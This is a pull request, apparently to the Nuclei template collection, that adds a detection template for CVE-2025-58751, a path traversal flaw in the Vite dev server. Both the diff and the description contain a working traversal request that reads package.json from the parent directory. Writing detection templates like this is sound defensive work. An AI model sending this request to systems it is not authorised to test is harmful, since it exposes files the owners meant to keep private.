### PR TITLE
Add CVE-2025-58751

### DIFF
--- a/http/cves/2025/CVE-2025-58751.yaml
+++ b/http/cves/2025/CVE-2025-58751.yaml
@@ -11,24 +11,29 @@ info:
   remediation: |
     Update to versions 7.1.5, 7.0.7, 6.3.6, or 5.4.20 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-58751
     - https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-58751
+  classification:
+    cve-id: CVE-2025-58751
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-22
   metadata:
     verified: true
     max-request: 1
     fofa-query: body="/@vite/client"
   tags: cve,cve2025,vite,lfi
 
+
 http:
-  - raw:
-      - |
-        GET /../package.json HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/../package.json"
 
     matchers:
       - type: dsl
         dsl:
           - 'status_code == 200'
-          - 'contains(content_type,"application/json")'
+          - 'contains(content_type, "application/json")'
           - 'contains_all(body, "\"name\":", "\"overrides\":")'
         condition: and


### PR DESCRIPTION
### Template / PR Information

This adds a new template to detect the CVE-2025-58751 vulnerability. This is a Path Traversal vulnerability in the Vite Dev Server. An attacker can use characters like ../ to access restricted files in parent directories (e.g., package.json).

- Added CVE-2025-58751
- References:

https://nvd.nist.gov/vuln/detail/CVE-2025-58751
https://github.com/advisories/GHSA-g4jq-h2w9-997c

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

HTTP Matched response data snippet

Below is an example of the HTTP request sent by this template and the expected response data when it detects the vulnerability.

Request:
The template attempts to access the package.json file located in the web server's parent directory.
```
GET /../package.json HTTP/1.1
Host: {{Hostname}}
User-Agent: Nuclei
Accept: */*
Connection: close
```
Expected Response:
If the server is vulnerable, the access will be successful, returning a 200 OK status code and the contents of the package.json file. The template confirms the vulnerability by checking if the response header contains application/json and if the body contains keywords like "name" and "version".

```
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 123

{
  "name": "vite-project",
  "private": true,
  "version": "0.0.0",
  ...
}
```




### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
- vitejs/vite@09f2b52
- vitejs/vite@4f1c35b
- vitejs/vite@63e2a5d
- vitejs/vite@e11d240